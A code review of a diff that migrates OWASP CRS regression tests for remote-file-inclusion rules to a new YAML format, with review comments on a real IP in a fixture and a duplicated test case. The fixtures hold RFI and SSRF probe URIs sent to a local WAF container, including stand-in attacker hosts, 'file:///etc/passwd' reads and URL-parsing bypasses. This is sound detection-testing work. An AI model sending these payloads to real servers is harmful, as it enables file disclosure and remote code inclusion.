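Review bot: The test URI in this hunk embeds a public-looking IPv4 address (`src=http://66.240.183.75/crash.php`) as the remote-inclusion target; go-ftw only sends the request to the local test container and the rule is expected to block it, but a real address in a fixture can point at an arbitrary third party over time and is an unnecessary outbound reference if any harness ever proxies the request. An address from the RFC 5737 documentation range, e.g. `uri: "/get/wp-content/themes/thedawn/lib/scripts/timthumb.php?src=http://192.0.2.1/crash.php"`, exercises the same rule without that exposure. `Referer: http` is presumably intentional as a minimal header value, but a short comment above it would save the next reader from assuming it is truncated.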
@@ -1,70 +1,68 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 931110.yaml +rule_id: 931110 tests: - - test_title: 931110-1 + - test_id: 1 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [931110] + - test_id: 2 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" - - test_title: 931110-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=https://foo.bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [931110] + - test_id: 3 desc: Remote File Inclusion Attack (931110) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" - version: "HTTP/1.1" - output: - log_contains: id "931110" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get/plugins/spamx/BaseAdmin.class.php?_CONF[path]=https://foo.bar" + version: "HTTP/1.1" + output: + log: + expect_ids: [931110] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml index 44e910d55..3bf7fb547 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931120.yaml 
@@ -1,135 +1,133 @@ --- meta: author: "studersi, azurit" - description: None - enabled: true - name: 931120.yaml +rule_id: 931120 tests: - - test_title: 931120-1 + - test_id: 1 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 2 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 3 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftps?" 
- version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 4 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 5 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https?" 
+ version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 6 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?" - version: HTTP/1.1 - output: - log_contains: id "931120" - - test_title: 931120-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?" + version: HTTP/1.1 + output: + log: + expect_ids: [931120] + - test_id: 7 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar?foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id "931120" - - test_title: 931120-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar?foo=bar" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931120] + - test_id: 8 desc: Remote File Inclusion Attack (931120) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar&foo=bar" - version: HTTP/1.1 - output: - no_log_contains: id 
"931120" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar&foo=bar" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931120] diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml index 36542f7d3..d67a67c03 100644 --- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml +++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931130.yaml 
@@ -1,359 +1,357 @@ --- meta: author: "studersi, azurit" - description: None - enabled: true - name: 931130.yaml +rule_id: 931130 tests: - - test_title: 931130-1 + - test_id: 1 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=file://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 2 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ftp://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-3 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftp://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 3 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: 
"/get?x=ftps://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-4 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ftps://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 4 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-5 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 5 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-6 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 6 desc: Partial match stages: - - stage: - input: 
- dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://evilexample.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-7 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://evilexample.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 7 desc: Mismatching domains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com.evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-8 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com.evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 8 desc: Mismatching ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-9 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 9 desc: Matching hosts stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-10 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com/" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931130] + - test_id: 10 desc: Matching hosts and ports stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=https://example.com:1234/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-11 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=https://example.com:1234/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 11 desc: Subdomains stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://www.example.com/some/path" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-12 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://www.example.com/some/path" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931130] + - test_id: 12 desc: Bypass 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:asd@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-13 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:asd@evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 13 desc: Bypass 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-14 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f@evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 14 desc: Bypass 3 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-15 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://example.com%2f:foo@bar@evil.com/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 15 desc: basic auth stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: example.com - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=http://foo:bar@example.com/" - version: HTTP/1.1 - output: - no_log_contains: id "931130" - - test_title: 931130-16 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: example.com + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=http://foo:bar@example.com/" + version: HTTP/1.1 + output: + log: + no_expect_ids: [931130] + - test_id: 16 desc: "Positive test: Remote File Inclusion Attack (931130) - Detect url:file://" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://foo.bar" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-17 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://foo.bar" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 17 desc: Remote File Inclusion Attack (931130) - Detect gopher:// stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=gopher://google.com/_SSRFTest!" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-18 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=gopher://google.com/_SSRFTest!" 
+ version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 18 desc: Remote File Inclusion Attack (931130) - Ldap Protocol stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=ldap://127.0.0.1/" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-19 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=ldap://127.0.0.1/" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 19 desc: Remote File Inclusion Attack (931130) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=jar:http://evil.co/b.zip!a" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-20 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=jar:http://evil.co/b.zip!a" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 20 desc: Remote File Inclusion Attack (931130) with Java backend stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file://etc/services" - version: 
HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-21 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file://etc/services" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 21 desc: Remote File Inclusion Attack (931130) with local_file url scheme stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=local_file://something" - version: HTTP/1.1 - output: - log_contains: id "931130" - - test_title: 931130-22 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=local_file://something" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] + - test_id: 22 desc: Remote File Inclusion Attack (931130) with Java backend and trailing / stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?x=url:file:///etc/passwd" - version: HTTP/1.1 - output: - log_contains: id "931130" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?x=url:file:///etc/passwd" + version: HTTP/1.1 + output: + log: + expect_ids: [931130] 
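Review bot: Test 10 (`desc: Matching hosts and ports`) sends exactly the same request as test 8 (`desc: Mismatching ports`) — `Host: example.com` with `uri: "/get?x=https://example.com:1234/"` — and asserts the same `expect_ids: [931130]`, so it does not exercise the case its description names and the two can only pass or fail together. If the intent is the same as test 9's host-only case (a URL pointing back at the request's own host should not fire), test 10 should send `Host: "example.com:1234"` with `no_expect_ids: [931130]`; whether the rule actually compares ports is not visible in this hunk, so if it does not, either rename the desc (e.g. `desc: Matching hosts, mismatching ports`) or drop the duplicate stage. Tests 1–5 also share the single desc `Remote File Inclusion Attack (931130)` while each probes a different scheme (`file://`, `ftp://`, `ftps://`, `http://`, `https://`); now that `test_title` is gone, naming the scheme in each desc would make a failing `test_id` self-explaining in CI output.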
diff --git a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
index 35e73e0eb..76c23d6eb 100644
--- a/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
+++ b/tests/regression/tests/REQUEST-931-APPLICATION-ATTACK-RFI/931131.yaml
@@ -1,23 +1,21 @@
 ---
 meta:
 author: "emphazer, azurit"
- description: None
- enabled: true
- name: 931131.yaml
+rule_id: 931131
 tests:
- - test_title: 931131-1
+ - test_id: 1
 desc: Remote File Inclusion Attack (931131) with REQUEST_FILENAME
 stages:
- - stage:
- input:
- dest_addr: 127.0.0.1
- headers:
- User-Agent: "OWASP CRS test agent"
- Host: localhost
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
- method: GET
- port: 80
